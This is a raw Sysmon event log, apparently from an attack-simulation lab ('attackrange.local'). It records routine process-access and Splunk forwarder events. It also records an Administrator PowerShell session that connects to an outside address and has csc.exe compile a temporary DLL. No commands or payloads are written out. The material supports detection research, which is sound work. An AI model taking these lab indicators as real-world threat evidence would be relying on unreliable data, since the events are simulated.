12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DDEC85CAEE8AD1C00B10850747F42C5E,SHA256=AA8F5CB9A75FC96F95C60432F4AF1EF1F960E154BD3B6889E0E4E0C9BFFB9042,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System
32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:44.611{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+386f0|C:\Windows\System32\modernexecserver.dll+2ff00|C:\Windows\System32\modernexecserver.dll+1e81d|C:\Windows\System32\modernexecserver.dll+1e514|C:\Windows\System32\modernexecserver.dll+49142|C:\Windows\System32\modernexecserver.dll+14a47|C:\Windows\SYSTEM32\ntdll.dll+3a9e0|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.564{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=55D9F3C30AC3EE090EBB1CE8EBD821A3,SHA256=EA0A6D99E0F99AE59FCF6D8444F43BA407BDFAC3F81AC33C4C2B8F499AFEA99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.564{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=47E88154EA7FBB9F378458945EDCEFCD,SHA256=6ABCDE2993BAD0E5719E62B00255B6177B6322F472B68156CEDFA751EBBA7005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.470{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73AB3BA5AC6AD7BF0C287F9F59891508,SHA256=BC3AFE7DD6637A6E0B257B9ADF7483C8F9652890F12C58C9A019635BB38D62CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.455{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AD56DFA8ECDE264AFF77DC7961B82326,SHA256=C9391B781C9B3F45106CA79C327F786B5A16FEF0CD0A8060F5A32D3C7A66BBD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.982{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=324397024DA93FB5ECC976070F4A3A2D,SHA256=D79B9129766108234CC8D1FB92A6E7A31936A9A48D78EECD6DEA853442C4B9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.904{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=64ABC676233C757A06533174C00140CC,SHA256=65BE61B16A73552C41952895D20C3EBEE70F5EBB8CF64672458C62F2B17F81B5,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.169{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53589-false93.184.220.29-80http 23542300x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.748{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BA63A4949F0B0459C21A268F657BFD6,SHA256=4CED1247B46912EC381212E023E72DADFAADA6E2EEB42055630774469E44044E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.748{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CB224B2A1DE28616F1706D7A0567886D,SHA256=2180BEB5964B1B9D3D354CA03BF11307E2CE39E96EEA69E8AC15B1991E88DED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.717{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=46CE0A810285647B000A3E8209C12284,SHA256=837C33A9A283A095266385AF3C1D0BCDA882B46C98F84E7F25F3F117D932754E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:45.670{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=79152A40A066B7A9543A33AFC5B7FF63,SHA256=A001583BEBC62103385137975292A48D466EF7616F4D3D71E73D4608E23A282E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.624{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34BACD65A075F88328A0FD34936CB6AF,SHA256=39BCD784A1CCCB6C076712B3DC3E02E791189AFCBA11273E04E62387DA38FA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.592{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=63F1C4E56696F6E012CDAB55BD94E997,SHA256=7FA38C503CB72AAF6046F664BEFD7FB78D93E6D0DA2D0493BEEB1AF6DCE72F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.546{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3B88F32B96EE40BECF977B6F58AF64FC,SHA256=8905B04B84817621446C4EFD0124C6FB39164893B0C9A3C9040E30863B93F646,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000007855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.499{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9B76FA6FE54FE64D6977648DCB8850ED,SHA256=AEAC2A594269B1825B2BC04F23E6EB8B59B13224E36091479C4582D88BA069E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.452{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=10D84E890A5415DA3DA15650FCE8B4B5,SHA256=FB8E1737FBB6502851F26802F7387F87D9AFC0E51DC91F56189B9EFBE0CB16E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.405{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6CC1016706D2BEB97898C2F634A29D34,SHA256=C78F4915F646445A564DCEDC961DBF5F527F9D158462C915316915659B24C5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.359{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=76FE218AE08CE1722EF8BE393BD8E7D7,SHA256=21EA602059F2E1B20B5E4144539231566883D65718FE90884B6906EDD06502AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.312{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A86093F5899F8B6A3BE44DF9AC99AFE9,SHA256=23153228FF2EFE89DF474801D5375CB904157523AC0C9B0315227D0F3320D2B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.265{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DC3E1E06072DDD184A7FFABE91158497,SHA256=13D8A0D58BCFA30555C118BCE248E09CCA46AD4B09433A21ADBBF96957D480B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.234{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C8378F9516FE8D6BC366DE9EB4E052FA,SHA256=3CDB06613416D28DC9B20035B611919AFD3DABBFF17D2AB0BABB4BAEFD50AC0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.172{266CAFBE-648B-6064-7A00-00000000AE01}4692NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5EBAB6D12128AC7DF28901C4A46C488B,SHA256=7C93C063264CEBC63DA48517F55CFA183C747DDEFD906C6940630F76A2DD4BA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.125{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A1755121CDAB56265783C2093CBFCAB0,SHA256=C0024ADFF802B4F311B7FCF5E1A68C4F98647D9177190E66027A0D1A7AE4689C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.078{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D58D6767E38389E149A834CC9017E08F,SHA256=1F7B60EDE4CC5C6A14E01AFD5E5595AAFD178E4773C630166F1A1F1E649F45B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:45.031{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9110BB521D7665947C4A20A873282CC9,SHA256=612E6C36C50DD4385ED87F3D52AE195206A34198A4F81B9264E8F2DCFF33385C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000007892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dllMD5=E6277FEB16D6984A04D99821E09BA67C,SHA256=F2239651896D013AF1EBB9117FFE5F676341B81B8B44364781CC93050B7DD320,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.outMD5=B54AD6910188B1BE6A04B54BE67F9841,SHA256=90B0257F5EB50FD946ECBEE316E85991F3DAA15FAC3F697DDFDACF834A67FB3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.cmdlineMD5=C61DEC740CDB20247F0FBD518110BD81,SHA256=66E9F5550218A6B7B896D88AE0A399E06102E0905F5E1073D0E9103459896E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.668{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.0.csMD5=D9ACA9FFA16C22410A16DE5D5571469D,SHA256=74E86BCD8E601DAC165642F69B571B651867BE0251D7B3D9498D1F080E4D8391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:46.668{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\CSCD82B1FD6BFA44FE3AD706A9C26EF4E.TMPMD5=10CDA81239B3694FA2D6928B8FF75CE9,SHA256=12733F0795F3ED58C1684B2324CDF6CB795DB3968C98F212BD7308C9BDC80E7C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dll2021-03-31 12:02:46.200 23542300x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:46.605{266CAFBE-64E6-6064-BD00-00000000AE01}6496ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\apa15htr\apa15htr.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 